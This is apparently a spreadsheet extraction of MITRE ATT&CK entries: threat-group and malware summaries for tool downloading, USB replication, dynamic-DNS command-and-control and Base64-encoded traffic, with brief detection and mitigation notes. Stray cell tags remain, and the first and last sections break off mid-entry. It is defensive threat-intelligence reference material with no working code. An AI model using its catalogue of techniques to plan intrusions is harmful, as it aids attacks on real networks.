[Ember Bear](https://attack.mitre.org/groups/G1003) has used tools to download malicious code.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Evilnum
[Evilnum](https://attack.mitre.org/groups/G0120) can deploy additional components or tools as needed.(Citation: ESET EvilNum July 2020)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has downloaded additional tools and malware to compromised systems.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has downloaded additional malware to execute on the victim's machine, including by using a PowerShell script to launch shellcode that retrieves an additional payload.(Citation: FireEye FIN7 April 2017)(Citation: DOJ FIN7 Aug 2018)(Citation: Mandiant FIN7 Apr 2022) 
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has used remote code execution to download subsequent payloads.(Citation: FireEye Fin8 May 2016)(Citation: Bitdefender FIN8 July 2021)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has downloaded additional tools including [PsExec](https://attack.mitre.org/software/S0029) directly to endpoints.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) dropped additional tools to victims during their operation, including portqry.exe, a renamed cmd.exe file, winrar, and [HTRAN](https://attack.mitre.org/software/S0040).(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has downloaded additional malware and tools onto a compromised host.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: Microsoft Actinium February 2022)
Gorgon Group
[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can download additional files from C2 servers.(Citation: Unit 42 Gorgon Group Aug 2018)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has downloaded malware and tools--including Nishang and PowerCat--onto a compromised host.(Citation: Microsoft HAFNIUM March 2020)(Citation: Rapid7 HAFNIUM Mar 2021) 
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has downloaded additional payloads and malicious scripts onto a compromised host.(Citation: Kaspersky Lyceum October 2021)
IndigoZebra
[IndigoZebra](https://attack.mitre.org/groups/G0136) has downloaded additional files and tools from its C2 server.(Citation: Checkpoint IndigoZebra July 2021)
Indrik Spider
[Indrik Spider](https://attack.mitre.org/groups/G0119) has downloaded additional scripts, malware, and tools onto a compromised host.(Citation: Crowdstrike Indrik November 2018)(Citation: Symantec WastedLocker June 2020)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has used tools to download files to compromised machines.(Citation: Microsoft NICKEL December 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has downloaded additional scripts, tools, and malware onto victim systems.(Citation: Crowdstrike GTR2020 Mar 2020)(Citation: Talos Kimsuky Nov 2021)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has downloaded files, malware, and tools from its C2 onto a compromised host.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: Novetta Blockbuster Loaders)(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)(Citation: Kaspersky ThreatNeedle Feb 2021)(Citation: Google TAG Lazarus Jan 2021)(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)(Citation: ESET Twitter Ida Pro Nov 2021)
LazyScripter
[LazyScripter](https://attack.mitre.org/groups/G0140) had downloaded additional tools to a compromised host.(Citation: MalwareBytes LazyScripter Feb 2021)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has downloaded additional scripts and files from adversary-controlled servers.(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has downloaded additional malware and tools onto a compromised host.(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has downloaded additional code and files from servers onto victims.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)(Citation: Microsoft Iranian Threat Actor Trends November 2021)
Metador
[Metador](https://attack.mitre.org/groups/G1013) has downloaded tools and malware onto a compromised system.(Citation: SentinelLabs Metador Sept 2022)
Molerats
[Molerats](https://attack.mitre.org/groups/G0021) used executables to download malicious files from different sources.(Citation: Kaspersky MoleRATs April 2019)(Citation: Unit42 Molerat Mar 2020) 
Moses Staff
[Moses Staff](https://attack.mitre.org/groups/G1009) has downloaded and installed web shells to following path &lt;code&gt;C:\inetpub\wwwroot\aspnet_client\system_web\IISpool.aspx&lt;/code&gt;.(Citation: Checkpoint MosesStaff Nov 2021)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that can upload additional files to the victim’s machine.(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Reaqta MuddyWater November 2017)(Citation: Trend Micro Muddy Water March 2021)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has downloaded additional executables following the initial infection stage.(Citation: Recorded Future REDDELTA July 2020)
Nomadic Octopus
[Nomadic Octopus](https://attack.mitre.org/groups/G0133) has used malicious macros to download additional files to the victim's machine.(Citation: ESET Nomadic Octopus 2018) 
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) can download remote files onto victims.(Citation: FireEye APT34 Dec 2017)
PLATINUM
[PLATINUM](https://attack.mitre.org/groups/G0068) has transferred files using the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel.(Citation: Microsoft PLATINUM June 2017)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) payloads download additional files from the C2 server.(Citation: Securelist Dropping Elephant)(Citation: TrendMicro Patchwork Dec 2017)
Rancor
[Rancor](https://attack.mitre.org/groups/G0075) has downloaded additional malware, including by using [certutil](https://attack.mitre.org/software/S0160).(Citation: Rancor Unit42 June 2018)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) used malware to download additional malicious files to the target system.(Citation: Talos Rocke August 2018)	
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has pushed additional malicious tools onto an infected system to steal user credentials, move laterally, and destroy data.(Citation: ESET Telebots Dec 2016)(Citation: US District Court Indictment GRU Unit 74455 October 2020)
SideCopy
[SideCopy](https://attack.mitre.org/groups/G1008) has delivered trojanized executables via spearphishing emails that contacts actor-controlled servers to download malicious payloads.(Citation: MalwareBytes SideCopy Dec 2021)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has used LNK files to download remote files to the victim's network.(Citation: ATT Sidewinder January 2021)(Citation: Cyble Sidewinder September 2020)
Silence
[Silence](https://attack.mitre.org/groups/G0091) has downloaded additional modules and malware to victim’s machines.(Citation: Group IB Silence Sept 2018)	
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has used malicious scripts and macros with the ability to download additional payloads.(Citation: Cisco Operation Layover September 2021)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has downloaded additional malware to execute on victim systems.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)(Citation: ProofPoint SettingContent-ms July 2018)
TA551
[TA551](https://attack.mitre.org/groups/G0127) has retrieved DLLs and installer binaries for malware execution from C2.(Citation: Unit 42 TA551 Jan 2021)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has the &lt;code&gt;curl&lt;/code&gt; and &lt;code&gt;wget&lt;/code&gt; commands as well as batch scripts to download new tools.(Citation: Intezer TeamTNT September 2020)(Citation: Cisco Talos Intelligence Group)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has downloaded additional malware and tools, including through the use of `certutil`, onto a compromised host .(Citation: Dell TG-3390)(Citation: Trend Micro DRBControl February 2020)
Tonto Team
[Tonto Team](https://attack.mitre.org/groups/G0131) has downloaded malicious DLLs which served as a [ShadowPad](https://attack.mitre.org/software/S0596) loader.(Citation: ESET Exchange Mar 2021)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used a delivered trojan to download additional files.(Citation: TrendMicro Tropic Trooper May 2020)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used shellcode to download Meterpreter after compromising a victim.(Citation: ESET Turla Mosquito May 2018)
Volatile Cedar
[Volatile Cedar](https://attack.mitre.org/groups/G0123) can deploy additional tools.(Citation: ClearSky Lebanese Cedar Jan 2021)
WIRTE
[WIRTE](https://attack.mitre.org/groups/G0090) has downloaded PowerShell code from the C2 server to be executed.(Citation: Lab52 WIRTE Apr 2019)
Whitefly
[Whitefly](https://attack.mitre.org/groups/G0107) has the ability to download additional tools from the C2.(Citation: Symantec Whitefly March 2019)
Windshift
[Windshift](https://attack.mitre.org/groups/G0112) has used tools to deploy additional payloads to compromised hosts.(Citation: BlackBerry Bahamut)
Winnti Group
[Winnti Group](https://attack.mitre.org/groups/G0044) has downloaded an auxiliary program named ff.exe to infected machines.(Citation: Kaspersky Winnti April 2013)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) can transfer malicious payloads such as ransomware to compromised machines.(Citation: Mandiant FIN12 Oct 2021)
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used tools to download malicious files to compromised hosts.(Citation: Zscaler APT31 Covid-19 October 2020)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has installed updates and new malware on victims.(Citation: PWC Cloud Hopper April 2017)(Citation: District Court of NY APT10 Indictment December 2018)
ABK
[ABK](https://attack.mitre.org/software/S0469) has the ability to download files from C2.(Citation: Trend Micro Tick November 2019)
ANDROMEDA
[ANDROMEDA](https://attack.mitre.org/software/S1074) can download additional payloads from C2.(Citation: Mandiant Suspected Turla Campaign February 2023)
Action RAT
[Action RAT](https://attack.mitre.org/software/S1028) has the ability to download additional payloads onto an infected machine.(Citation: MalwareBytes SideCopy Dec 2021)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) can download additional files for execution on the victim’s machine.(Citation: Talos Agent Tesla Oct 2018)(Citation: DigiTrust Agent Tesla Jan 2017)
Agent.btz
[Agent.btz](https://attack.mitre.org/software/S0092) attempts to download an encrypted binary from a specified domain.(Citation: ThreatExpert Agent.btz)
Amadey
[Amadey](https://attack.mitre.org/software/S1025) can download and execute files to further infect a host machine with additional malware.(Citation: BlackBerry Amadey 2020)
Anchor
[Anchor](https://attack.mitre.org/software/S0504) can download additional payloads.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)
Aria-body
[Aria-body](https://attack.mitre.org/software/S0456) has the ability to download additional payloads from C2.(Citation: CheckPoint Naikon May 2020)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) uses [certutil](https://attack.mitre.org/software/S0160) and [BITSAdmin](https://attack.mitre.org/software/S0190) to download additional malware. (Citation: Cofense Astaroth Sept 2018)(Citation: Cybereason Astaroth Feb 2019)(Citation: Securelist Brazilian Banking Malware July 2020)
AsyncRAT
[AsyncRAT](https://attack.mitre.org/software/S1087) has the ability to download files over SFTP.(Citation: AsyncRAT GitHub)
Attor
[Attor](https://attack.mitre.org/software/S0438) can download additional plugins, updates and other files. (Citation: ESET Attor Oct 2019)
AuditCred
[AuditCred](https://attack.mitre.org/software/S0347) can download files and additional malware.(Citation: TrendMicro Lazarus Nov 2018)
Avenger
[Avenger](https://attack.mitre.org/software/S0473) has the ability to download files from C2 to a compromised host.(Citation: Trend Micro Tick November 2019)
Azorult
[Azorult](https://attack.mitre.org/software/S0344) can download and execute additional files. [Azorult](https://attack.mitre.org/software/S0344) has also downloaded a ransomware payload called Hermes.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)
BADFLICK
[BADFLICK](https://attack.mitre.org/software/S0642) has download files from its C2 server.(Citation: Accenture MUDCARP March 2019)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) has the ability to load a second stage malicious DLL file onto a compromised machine.(Citation: Gigamon BADHATCH Jul 2019) 
BADNEWS
[BADNEWS](https://attack.mitre.org/software/S0128) is capable of downloading additional files through C2 channels, including a new version of itself.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)
BBK
[BBK](https://attack.mitre.org/software/S0470) has the ability to download files from C2 to the infected host.(Citation: Trend Micro Tick November 2019)
BISCUIT
[BISCUIT](https://attack.mitre.org/software/S0017) has a command to download a file from the C2 server.(Citation: Mandiant APT1 Appendix)
BITSAdmin
[BITSAdmin](https://attack.mitre.org/software/S0190) can be used to create [BITS Jobs](https://attack.mitre.org/techniques/T1197) to upload and/or download files.(Citation: Microsoft BITSAdmin)
BLINDINGCAN
[BLINDINGCAN](https://attack.mitre.org/software/S0520) has downloaded files to a victim machine.(Citation: US-CERT BLINDINGCAN Aug 2020)
BLUELIGHT
[BLUELIGHT](https://attack.mitre.org/software/S0657) can download additional files onto the host.(Citation: Volexity InkySquid BLUELIGHT August 2021) 
BONDUPDATER
[BONDUPDATER](https://attack.mitre.org/software/S0360) can download or upload files from its C2 server.(Citation: Palo Alto OilRig Sep 2018)
BabyShark
[BabyShark](https://attack.mitre.org/software/S0414) has downloaded additional files from the C2.(Citation: Unit42 BabyShark Apr 2019)(Citation: CISA AA20-301A Kimsuky)
BackConfig
[BackConfig](https://attack.mitre.org/software/S0475) can download and execute additional payloads on a compromised host.(Citation: Unit 42 BackConfig May 2020)
Backdoor.Oldrea
[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) can download additional modules from C2.(Citation: Gigamon Berserk Bear October 2021)
BadPatch
[BadPatch](https://attack.mitre.org/software/S0337) can download and execute or update malware.(Citation: Unit 42 BadPatch Oct 2017)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) can download files to the system.(Citation: CheckPoint Bandook Nov 2020)
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) uploads files and secondary payloads to the victim's machine.(Citation: US-CERT Bankshot Dec 2017)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can download and deploy additional payloads, including ransomware and post-exploitation frameworks such as [Cobalt Strike](https://attack.mitre.org/software/S0154).(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)(Citation: NCC Group Team9 June 2020)(Citation: CrowdStrike Wizard Spider October 2020)
BendyBear
[BendyBear](https://attack.mitre.org/software/S0574) is designed to download an implant from a C2 server.(Citation: Unit42 BendyBear Feb 2021)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) has the capability to download files to execute on the victim’s machine.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020) 
BlackMould
[BlackMould](https://attack.mitre.org/software/S0564) has the ability to download files to the victim's machine.(Citation: Microsoft GALLIUM December 2019)
Bonadan
[Bonadan](https://attack.mitre.org/software/S0486) can download additional modules from the C2 server.(Citation: ESET ForSSHe December 2018)
BoomBox
[BoomBox](https://attack.mitre.org/software/S0635) has the ability to download next stage malware components to a compromised system.(Citation: MSTIC Nobelium Toolset May 2021)
BoxCaon
[BoxCaon](https://attack.mitre.org/software/S0651) can download files.(Citation: Checkpoint IndigoZebra July 2021)
Briba
[Briba](https://attack.mitre.org/software/S0204) downloads files onto infected hosts.(Citation: Symantec Briba May 2012)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) can download files to compromised hosts.(Citation: Palo Alto Brute Ratel July 2022)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) can download and execute additional payloads including through the use of a `Dex` command.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)
Bundlore
[Bundlore](https://attack.mitre.org/software/S0482) can download and execute new versions of itself.(Citation: MacKeeper Bundlore Apr 2019)
CARROTBALL
[CARROTBALL](https://attack.mitre.org/software/S0465) has the ability to download and install a remote payload.(Citation: Unit 42 CARROTBAT January 2020)
CARROTBAT
[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to download and execute a remote file via [certutil](https://attack.mitre.org/software/S0160).(Citation: Unit 42 CARROTBAT November 2018)
CHOPSTICK
[CHOPSTICK](https://attack.mitre.org/software/S0023) is capable of performing remote file transmission.(Citation: Crowdstrike DNC June 2016)
CORESHELL
[CORESHELL](https://attack.mitre.org/software/S0137) downloads another dropper from its C2 server.(Citation: FireEye APT28)
CSPY Downloader
[CSPY Downloader](https://attack.mitre.org/software/S0527) can download additional tools to a compromised host.(Citation: Cybereason Kimsuky November 2020)
Calisto
[Calisto](https://attack.mitre.org/software/S0274) has the capability to upload and download files to the victim's machine.(Citation: Symantec Calisto July 2018)
CallMe
[CallMe](https://attack.mitre.org/software/S0077) has the capability to download a file to the victim from the C2 server.(Citation: Scarlet Mimic Jan 2016)
Cannon
[Cannon](https://attack.mitre.org/software/S0351) can download a payload for execution.(Citation: Unit42 Cannon Nov 2018)
Carberp
[Carberp](https://attack.mitre.org/software/S0484) can download and execute new plugins from the C2 server. (Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)
Cardinal RAT
[Cardinal RAT](https://attack.mitre.org/software/S0348) can download and execute additional payloads.(Citation: PaloAlto CardinalRat Apr 2017)
Caterpillar WebShell
[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to download and upload files to the system.(Citation: ClearSky Lebanese Cedar Jan 2021) 
ChChes
[ChChes](https://attack.mitre.org/software/S0144) is capable of downloading files, including additional modules.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)(Citation: FireEye APT10 April 2017)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) can download additional files onto an infected machine.(Citation: Cybereason Chaes Nov 2020)
CharmPower
[CharmPower](https://attack.mitre.org/software/S0674) has the ability to download additional modules to a compromised host.(Citation: Check Point APT35 CharmPower January 2022)
China Chopper
[China Chopper](https://attack.mitre.org/software/S0020)'s server component can download remote files.(Citation: FireEye Periscope March 2018)(Citation: Lee 2013)(Citation: NCSC Joint Report Public Tools)(Citation: Rapid7 HAFNIUM Mar 2021)
Chrommme
[Chrommme](https://attack.mitre.org/software/S0667) can download its code from C2.(Citation: ESET Gelsemium June 2021)
CloudDuke
[CloudDuke](https://attack.mitre.org/software/S0054) downloads and executes additional malware from either a Web address or a Microsoft OneDrive account.(Citation: F-Secure The Dukes)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can deliver additional payloads to victim machines.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)
CoinTicker
[CoinTicker](https://attack.mitre.org/software/S0369) executes a Python script to download its second stage.(Citation: CoinTicker 2019)
Conficker
[Conficker](https://attack.mitre.org/software/S0608) downloads an HTTP server to the infected machine.(Citation: SANS Conficker)
CookieMiner
[CookieMiner](https://attack.mitre.org/software/S0492) can download additional scripts from a web server.(Citation: Unit42 CookieMiner Jan 2019)
CostaBricks
[CostaBricks](https://attack.mitre.org/software/S0614) h</t>
  </si>
  <si>
    <t xml:space="preserve">Drive Access
Monitor for unexpected file access on removable media
Drive Creation
Monitor for newly executed processes when removable media is mounted. 
Disable or Remove Feature or Program
Disable Autoruns if it is unnecessary.(Citation: Microsoft Disable Autorun)
Operating System Configuration
Disallow or restrict removable media at an organizational policy level if they are not required for business operations.(Citation: TechNet Removable Media Control)
APT28
[APT28](https://attack.mitre.org/groups/G0007) uses a tool that captures information from air-gapped computers via an infected USB and transfers it to network-connected computer when the USB is inserted.(Citation: Microsoft SIR Vol 19)
CHOPSTICK
Part of [APT28](https://attack.mitre.org/groups/G0007)'s operation involved using [CHOPSTICK](https://attack.mitre.org/software/S0023) modules to copy itself to air-gapped machines, using files written to USB sticks to transfer data and command traffic.(Citation: FireEye APT28)(Citation: ESET Sednit Part 2)(Citation: Microsoft SIR Vol 19)
USBStealer
[USBStealer](https://attack.mitre.org/software/S0136) drops commands for a second victim onto a removable media drive inserted into the first victim, and commands are executed when the drive is inserted into the second victim.(Citation: ESET Sednit USBStealer 2014)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts.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Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Malware researchers can reverse engineer malware variants that use dynamic resolution and determine future C2 infrastructure that the malware will attempt to contact, but this is a time and resource intensive effort.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA Brute Force)
Restrict Web-Based Content
In some cases a local DNS sinkhole may be used to help prevent behaviors associated with dynamic resolution.
C0026
During [C0026](https://attack.mitre.org/campaigns/C0026), the threat actors re-registered a ClouDNS dynamic DNS subdomain which was previously used by [ANDROMEDA](https://attack.mitre.org/software/S1074).(Citation: Mandiant Suspected Turla Campaign February 2023)
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used dynamic DNS services for C2.(Citation: McAfee Night Dragon)
Operation Dust Storm
For [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors used dynamic DNS domains from a variety of free providers, including No-IP, Oray, and 3322.(Citation: Cylance Dust Storm) 
Operation Spalax
For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used dynamic DNS services, including Duck DNS and DNS Exit, as part of their C2 infrastructure.(Citation: ESET Operation Spalax Jan 2021)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used dynamic DNS resolution to construct and resolve to randomly-generated subdomains for C2.(Citation: Volexity SolarWinds) 
APT29
[APT29](https://attack.mitre.org/groups/G0016) has used Dynamic DNS providers for their malware C2 infrastructure.(Citation: Mandiant APT29 Eye Spy Email Nov 22)
BITTER
[BITTER](https://attack.mitre.org/groups/G1002) has used DDNS for C2 communications.(Citation: Forcepoint BITTER Pakistan Oct 2016)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has incorporated dynamic DNS domains in its infrastructure.(Citation: Unit 42 Gamaredon February 2022)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has used dynamic DNS services for C2 infrastructure.(Citation: Proofpoint TA2541 February 2022)
Transparent Tribe
[Transparent Tribe](https://attack.mitre.org/groups/G0134) has used dynamic DNS services to set up C2.(Citation: Proofpoint Operation Transparent Tribe March 2016)
AsyncRAT
[AsyncRAT](https://attack.mitre.org/software/S1087) can be configured to use dynamic DNS.(Citation: AsyncRAT GitHub)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) has used a dynamic DNS service for C2.(Citation: Talos Bisonal Mar 2020)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) can use dynamic DNS domain names in C2.(Citation: ESET Gelsemium June 2021)
Maze
[Maze](https://attack.mitre.org/software/S0449) has forged POST strings with a random choice from a list of possibilities including "forum", "php", "view", etc. while making connection with the C2, hindering detection efforts.(Citation: McAfee Maze March 2020)
NETEAGLE
[NETEAGLE](https://attack.mitre.org/software/S0034) can use HTTP to download resources that contain an IP address and port number pair to connect to for C2.(Citation: FireEye APT30)
RTM
[RTM](https://attack.mitre.org/software/S0148) has resolved [Pony](https://attack.mitre.org/software/S0453) C2 server IP addresses by either converting Bitcoin blockchain transaction data to specific octets, or accessing IP addresses directly within the Namecoin blockchain.(Citation: CheckPoint Redaman October 2019)(Citation: Unit42 Redaman January 2019)
SUNBURST
[SUNBURST](https://attack.mitre.org/software/S0559) dynamically resolved C2 infrastructure for randomly-generated subdomains within a parent domain.(Citation: FireEye SUNBURST Backdoor December 2020)
Tomiris
[Tomiris](https://attack.mitre.org/software/S0671) has connected to a signalization server that provides a URL and port, and then [Tomiris](https://attack.mitre.org/software/S0671) sends a GET request to that URL to establish C2.(Citation: Kaspersky Tomiris Sep 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Traffic Content
Monitor for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Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary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
APT19
An [APT19](https://attack.mitre.org/groups/G0073) HTTP malware variant used Base64 to encode communications to the C2 server.(Citation: Unit 42 C0d0so0 Jan 2016)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has used base64 to encode command and control traffic.(Citation: FireEye APT33 Guardrail)
BRONZE BUTLER
Several [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) tools encode data with base64 when posting it to a C2 server.(Citation: Secureworks BRONZE BUTLER Oct 2017)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has used ASCII encoding for C2 traffic.(Citation: Microsoft HAFNIUM March 2020)
Lazarus Group
A [Lazarus Group](https://attack.mitre.org/groups/G0032) malware sample encodes data with base64.(Citation: McAfee Lazarus Resurfaces Feb 2018)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used tools to encode C2 communications including Base64 encoding.(Citation: ClearSky MuddyWater June 2019)(Citation: Trend Micro Muddy Water March 2021)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) used Base64 to encode C2 traffic.(Citation: Cymmetria Patchwork)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034)'s BCS-server tool uses base64 encoding and HTML tags for the communication traffic between the C2 server.(Citation: ESET Telebots Dec 2016)	
TA551
[TA551](https://attack.mitre.org/groups/G0127) has used encoded ASCII text for initial C2 communications.(Citation: Unit 42 Valak July 2020)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used base64 encoding to hide command strings delivered from the C2.(Citation: TrendMicro Tropic Trooper May 2020)
ADVSTORESHELL
C2 traffic from [ADVSTORESHELL](https://attack.mitre.org/software/S0045) is encrypted, then encoded with Base64 encoding.(Citation: Kaspersky Sofacy)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) encodes data using Base64 before sending it to the C2 server. (Citation: Cofense Astaroth Sept 2018)
AutoIt backdoor
[AutoIt backdoor](https://attack.mitre.org/software/S0129) has sent a C2 response that was base64-encoded.(Citation: Forcepoint Monsoon)
BADNEWS
[BADNEWS](https://attack.mitre.org/software/S0128) encodes C2 traffic with base64.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)
BLINDINGCAN
[BLINDINGCAN](https://attack.mitre.org/software/S0520) has encoded its C2 traffic with Base64.(Citation: US-CERT BLINDINGCAN Aug 2020)
BS2005
[BS2005](https://attack.mitre.org/software/S0014) uses Base64 encoding for communication in the message body of an HTTP request.(Citation: Mandiant Operation Ke3chang November 2014)
BabyShark
[BabyShark](https://attack.mitre.org/software/S0414) has encoded data using [certutil](https://attack.mitre.org/software/S0160) before exfiltration.(Citation: Unit42 BabyShark Feb 2019)
Backdoor.Oldrea
Some [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) samples use standard Base64 + bzip2, and some use standard Base64 + reverse XOR + RSA-2048 to decrypt data received from C2 servers.(Citation: Symantec Dragonfly)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) has encoded binary data with Base64 and ASCII.(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020) 
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) has the ability to base64 encode C2 server responses.(Citation: Proofpoint Bumblebee April 2022)
CORESHELL
[CORESHELL](https://attack.mitre.org/software/S0137) C2 messages are Base64-encoded.(Citation: FireEye APT28)
Carbanak
[Carbanak](https://attack.mitre.org/software/S0030) encodes the message body of HTTP traffic with Base64.(Citation: Kaspersky Carbanak)(Citation: FireEye CARBANAK June 2017)
ChChes
[ChChes](https://attack.mitre.org/software/S0144) can encode C2 data with a custom technique that utilizes Base64.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)	
Chaes
[Chaes](https://attack.mitre.org/software/S0631) has used Base64 to encode C2 communications.(Citation: Cybereason Chaes Nov 2020) 
CharmPower
[CharmPower](https://attack.mitre.org/software/S0674) can send additional modules over C2 encoded with base64.(Citation: Check Point APT35 CharmPower January 2022)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can use Base64, URL-safe Base64, or NetBIOS encoding in its C2 traffic.(Citation: Cobalt Strike Manual 4.3 November 2020)
Cobian RAT
[Cobian RAT](https://attack.mitre.org/software/S0338) obfuscates communications with the C2 server using Base64 encoding.(Citation: Zscaler Cobian Aug 2017)
CreepySnail
[CreepySnail](https://attack.mitre.org/software/S1024) can use Base64 to encode its C2 traffic.(Citation: Microsoft POLONIUM June 2022)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) encodes data using hexadecimal representation before sending it to the C2 server.(Citation: Prevailion DarkWatchman 2021)
Daserf
[Daserf](https://attack.mitre.org/software/S0187) uses custom base64 encoding to obfuscate HTTP traffic.(Citation: Secureworks BRONZE BUTLER Oct 2017)
Denis
[Denis](https://attack.mitre.org/software/S0354) encodes the data sent to the server in Base64.(Citation: Cybereason Cobalt Kitty 2017)
Dipsind
[Dipsind](https://attack.mitre.org/software/S0200) encodes C2 traffic with base64.(Citation: Microsoft PLATINUM April 2016)
DnsSystem
[DnsSystem](https://attack.mitre.org/software/S1021) can Base64 encode data sent to C2.(Citation: Zscaler Lyceum DnsSystem June 2022)
Ebury
[Ebury](https://attack.mitre.org/software/S0377) has encoded C2 traffic in hexadecimal format.(Citation: ESET Ebury Feb 2014)	
Elise
[Elise](https://attack.mitre.org/software/S0081) exfiltrates data using cookie values that are Base64-encoded.(Citation: Lotus Blossom Jun 2015)
Emotet
